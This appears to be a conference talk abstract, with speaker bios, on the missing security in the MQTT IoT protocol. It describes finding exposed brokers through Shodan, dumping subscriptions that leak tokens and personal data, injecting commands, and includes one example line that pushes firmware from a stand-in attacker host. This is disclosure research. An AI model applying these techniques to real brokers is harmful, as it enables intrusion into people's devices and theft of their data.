The presentation will begin by discussing the protocol (http://mqtt.org/) and results from a simple query on shodan, showing the number of servers directly available on the internet. We will then go through the protocol specifications which shows that security is more or less non-existent. We are able to directly connect to many of the servers which are open to the internet, and following protocol specifications, see what devices they are communicating with.
We will show how its possible to extract data on all subscriptions available on the server using a ruby script, which basically gives a detailed list of the devices. However, it is not only the list of devices we are getting. The data returned by our script also contains things like session tokens (for web pages), social security numbers, phone numbers, names and other sensitive data used for one purpose or another in the communication to and from the devices.
We will show how messages can be posted into the message queues and in turn received by the devices that subscribe to the various queues. This means that we are able to issue commands targeting the range of devices we have discovered, that use this protocol. We have however also discovered that this is not limited to messages and commands, if supported by the device, we can actually issue firmware updated, simply by sending something similar to "FIRMWAREUPDATEHERE:http://www.attacker.com/filename.bin".
A specific example of what we can see and do is a home automation system we discovered. We got a list of every sensor and its status. Furthermore, we got exact GPS coordinates from the mobile app used to control the home automation. So in this case, not only were we able to control the system, we even knew when the owner was away.
The talk will move on to show various implementations where webclients and SQL servers are hooked in. Much of the communication data is stored in various databases, and because we have access, we can use MQTT to attack the database and web servers.
Multiple tools have been developed by us already to support testing the protocol and fuzzing endpoints. we will show the tools used in various demos and release them at the end of the talk! These tools are currently scripts containing various protocol implementations, that can be used to target servers and extract, or inject, data. We also have a small client that implements all interesting areas of the protocol which we use for server-to-client testing.
We believe this talk is going to have a significant impact on MQTT and anyone who uses it. This is an old protocol from 1999. Its fast and reliable, but its missing security.
We also be believe this talk will trigger a discussion about light-weight IoT protocols and security, which is much needed at this point in time.
Lucas Lundgren has a vast experience in IT security, with the "bad luck" (or tendency) to annoy companies by reporting vulnerabilities in their products. Lucas started breaking things at the age of twelve, and has reported numerous vulnerabilities in various products. Having worked with penetration testing professionally for over 12 years, Lucas has held IT Security positions within companies such as Sony Ericsson and IOActive. He has also been part of Corelan Team before moving on to FortConsult (Part of NCC Group) Lucas has been breaking everything from OS vendors and financials, and he has spent a considerable amount of time inside "impenetrable fortresses". Lucas is primarily focusing on penetration testing as well as fuzzing and exploit development, no matter the platform or medium, were he also has a passion for IoT and Smart Technology.
Neal Hindocha has been working in the security industry since 1999. He began his work at Symantec, reverse engineering malware and writing signature for Symantec's antivirus products. From there, he moved on to penetration testing, and has since been a consultant for Verizon Business and Trustwave, where he helped build the mobile testing services and focused on deliveries for advanced projects. Currently, Neal is a Principal Consultant at FortConsult (part of NCC Group), focusing on new service areas such as cloud and IoT, whilst still reversing the odd malware and delivering pentests.